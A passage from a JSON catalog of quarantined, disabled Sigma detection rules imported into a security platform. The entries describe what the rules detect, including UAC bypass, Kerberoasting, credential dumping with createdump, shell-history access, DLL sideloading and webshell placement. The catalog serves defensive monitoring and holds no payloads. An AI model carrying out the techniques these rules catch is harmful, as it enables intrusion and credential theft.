"provenance": { "source": "SigmaHQ/sigma", "source_id": "4f7a6757-ff79-46db-9687-66501a02d9ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ldifde_export.yml" } }, { "id": "sigmahq-sigma-4f84b697-c9ed-4420-8ab5-e09af5b2345d", "type": "detection", "name": "New DLL Added to AppInit_DLLs Registry Key", "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows 
are loaded by user32.dll into every process that loads user32.dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-dll-added-to-appinit-dlls-registry-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" } }, { "id": "sigmahq-sigma-4fc0deee-0057-4998-ab31-d24e46e0aba4", "type": "detection", "name": "Potential System DLL Sideloading From Non System Locations", "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-system-dll-sideloading-from-non-system-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/image_load/image_load_side_load_from_non_system_location.yml" } }, { "id": "sigmahq-sigma-4fd6b1c7-19b8-4488-97f6-00f0924991a3", "type": "detection", "name": "PUA - NimScan Execution", "description": "Detects usage of NimScan, a portscanner utility.\nIn early 2025, adversaries were observed using this utility to scan for open ports on remote hosts in a compromised environment.\nThis rule identifies the execution of NimScan based on the process image name and specific hash values associated with different versions of the tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nimscan-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fd6b1c7-19b8-4488-97f6-00f0924991a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nimscan.yml" } }, { "id": "sigmahq-sigma-4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "type": "detection", "name": "Powershell LocalAccount Manipulation", "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/powershell-localaccount-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_localuser.yml" } }, { "id": "sigmahq-sigma-4fe074b4-b833-4081-8f24-7dcfeca72b42", "type": "detection", "name": "Security Tools Keyword Lookup Via Findstr.EXE", "description": "Detects execution of \"findstr\" to search for common names of security tools. Attackers often pipe the results of recon commands such as \"tasklist\" or \"whoami\" to \"findstr\" in order to filter out the results.\nThis detection focuses on the keywords that the attacker might use as a filter.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-tools-keyword-lookup-via-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fe074b4-b833-4081-8f24-7dcfeca72b42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml" } }, { "id": "sigmahq-sigma-4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", "type": "detection", "name": "MSExchange Transport Agent Installation - Builtin", "description": "Detects the 
Installation of an Exchange Transport Agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msexchange-transport-agent-installation-builtin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_transportagent.yml" } }, { "id": "sigmahq-sigma-4fe17521-aef3-4e6a-9d6b-4a7c8de155a8", "type": "detection", "name": "OpenCanary - GIT Clone Request", "description": "Detects instances where a GIT service on an OpenCanary node has had a Git Clone request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1213" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-git-clone-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fe17521-aef3-4e6a-9d6b-4a7c8de155a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_git_clone_request.yml" } }, { "id": "sigmahq-sigma-4fee3d51-8069-4a4c-a0f7-924fcaff2c70", "type": "detection", "name": "FileFix - Command 
Evidence in TypedPaths", "description": "Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/filefix-command-evidence-in-typedpaths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4fee3d51-8069-4a4c-a0f7-924fcaff2c70", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_filefix_typedpath_commands.yml" } }, { "id": "sigmahq-sigma-502b42de-4306-40b4-9596-6f590c81f073", "type": "detection", "name": "Local Accounts Discovery", "description": "Local accounts, System Owner/User discovery using operating systems utilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-accounts-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "502b42de-4306-40b4-9596-6f590c81f073", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml" } }, { "id": "sigmahq-sigma-503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "type": "detection", "name": "UAC Bypass Using ChangePK and SLUI", "description": "Detects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-changepk-and-slui.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" } }, { "id": "sigmahq-sigma-503fe26e-b5f2-4944-a126-eab405cc06e5", "type": "detection", "name": "Kerberos Network Traffic RC4 Ticket Encryption", "description": "Detects Kerberos TGS requests using RC4 encryption, which may be indicative of Kerberoasting", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kerberos-network-traffic-rc4-ticket-encryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "503fe26e-b5f2-4944-a126-eab405cc06e5", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_susp_kerberos_rc4.yml" } }, { "id": "sigmahq-sigma-504d63cb-0dba-4d02-8531-e72981aace2c", "type": "detection", "name": "Suspicious X509Enrollment - Ps Script", "description": "Detect use of X509Enrollment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-x509enrollment-ps-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "504d63cb-0dba-4d02-8531-e72981aace2c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" } }, { "id": "sigmahq-sigma-508a9374-ad52-4789-b568-fc358def2c65", "type": "detection", "name": "Suspicious History File Operations", "description": "Detects commandline operations on shell history files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-history-file-operations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "508a9374-ad52-4789-b568-fc358def2c65", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" } }, { "id": "sigmahq-sigma-50919691-7302-437f-8e10-1fe088afa145", "type": "detection", "name": "Regsvr32 DLL Execution With Uncommon Extension", "description": "Detects a \"regsvr32\" execution where the DLL doesn't contain a common file extension.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regsvr32-dll-execution-with-uncommon-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50919691-7302-437f-8e10-1fe088afa145", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml" } }, { "id": "sigmahq-sigma-509e84b9-a71a-40e0-834f-05470369bd1e", "type": "detection", "name": "Default RDP Port Changed to Non Standard Port", "description": "Detects changes to the default RDP port.\nRemote desktop is a common feature in operating systems. 
It allows a user to log into a remote system using an interactive session with a graphical user interface.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/default-rdp-port-changed-to-non-standard-port.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "509e84b9-a71a-40e0-834f-05470369bd1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" } }, { "id": "sigmahq-sigma-50a0aa3d-ab16-4594-a8aa-5145a6e6792b", "type": "detection", "name": "Python One-Liners with Base64 Decoding", "description": "Detects Python one-liners that use base64 decoding functions in command line executions.\nMalicious scripts or attackers often use python one-liners to decode and execute base64-encoded payloads, which is a common technique for obfuscation and evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.006", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-one-liners-with-base64-decoding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"50a0aa3d-ab16-4594-a8aa-5145a6e6792b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_python_base64_encoded_execution.yml" } }, { "id": "sigmahq-sigma-50a3c7aa-ec29-44a4-92c1-fce229eef6fc", "type": "detection", "name": "CA Policy Updated by Non Approved Actor", "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ca-policy-updated-by-non-approved-actor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" } }, { "id": "sigmahq-sigma-50cb47b8-2c33-4b23-a2e9-4600657d9746", "type": "detection", "name": "Loading Diagcab Package From Remote Path", "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/loading-diagcab-package-from-remote-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" } }, { "id": "sigmahq-sigma-50d66fb0-03f8-4da0-8add-84e77d12a020", "type": "detection", "name": "Suspicious RunAs-Like Flag Combination", "description": "Detects suspicious command line flags that let the user set a target user and command, as seen e.g. in PsExec-like tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-runas-like-flag-combination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50d66fb0-03f8-4da0-8add-84e77d12a020", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml" } }, { "id": "sigmahq-sigma-50e068d7-1e6b-4054-87e5-0a592c40c7e0", "type": "detection", "name": "Okta MFA Reset or Deactivated", "description": "Detects an attempt at deactivating or resetting MFA.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ 
"T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-mfa-reset-or-deactivated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_mfa_reset_or_deactivated.yml" } }, { "id": "sigmahq-sigma-50e54b8d-ad73-43f8-96a1-5191685b17a4", "type": "detection", "name": "Silenttrinity Stager Msbuild Activity", "description": "Detects possible remote connections to Silenttrinity C2", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/silenttrinity-stager-msbuild-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" } }, { "id": "sigmahq-sigma-50e606bf-04ce-4ca7-9d54-3449494bbd4b", "type": "detection", "name": "Cisco LDP Authentication Failures", "description": "Detects LDP failures, which may be indicative of brute force attacks to manipulate MPLS labels", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1110", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-ldp-authentication-failures.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50e606bf-04ce-4ca7-9d54-3449494bbd4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml" } }, { "id": "sigmahq-sigma-50f852e6-af22-4c78-9ede-42ef36aa3453", "type": "detection", "name": "Potential Azure Browser SSO Abuse", "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. 
the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-azure-browser-sso-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50f852e6-af22-4c78-9ede-42ef36aa3453", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml" } }, { "id": "sigmahq-sigma-512cf937-ea9b-4332-939c-4c2c94baadcd", "type": "detection", "name": "Azure Firewall Modified or Deleted", "description": "Identifies when a firewall is created, modified, or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-firewall-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "512cf937-ea9b-4332-939c-4c2c94baadcd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/cloud/azure/activity_logs/azure_firewall_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-512cff7a-683a-43ad-afe0-dd398e872f36", "type": "detection", "name": "OpenCanary - Telnet Login Attempt", "description": "Detects instances where a Telnet service on an OpenCanary node has had a login attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-telnet-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "512cff7a-683a-43ad-afe0-dd398e872f36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_telnet_login_attempt.yml" } }, { "id": "sigmahq-sigma-514e4c3a-c77d-4cde-a00f-046425e2301e", "type": "detection", "name": "Abuse of Service Permissions to Hide Services Via Set-Service", "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/abuse-of-service-permissions-to-hide-services-via-set-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml" } }, { "id": "sigmahq-sigma-514e7e3e-b3b4-4a67-af60-be20f139198b", "type": "detection", "name": "PUA - AdFind.EXE Execution", "description": "Detects execution of Adfind.exe utility, which can be used for reconnaissance in an Active Directory environment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-adfind-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "514e7e3e-b3b4-4a67-af60-be20f139198b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml" } }, { "id": 
"sigmahq-sigma-515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "type": "detection", "name": "CreateDump Process Dump", "description": "Detects use of the createdump.exe LOLBIN utility to dump process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/createdump-process-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml" } }, { "id": "sigmahq-sigma-516376b4-05cd-4122-bae0-ad7641c38d48", "type": "detection", "name": "Mailbox Export to Exchange Webserver", "description": "Detects a successful export of an Exchange mailbox to an untypical directory or with an aspx name suffix, which can be used to place a webshell, or the role assignment needed for it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mailbox-export-to-exchange-webserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "516376b4-05cd-4122-bae0-ad7641c38d48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml" } }, { "id": "sigmahq-sigma-51719bf5-e4fd-4e44-8ba8-b830e7ac0731", "type": "detection", "name": "Creation Of A Local User Account", "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-a-local-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_create_account.yml" } }, { "id": "sigmahq-sigma-517490a7-115a-48c6-8862-1a481504d5a8", "type": "detection", 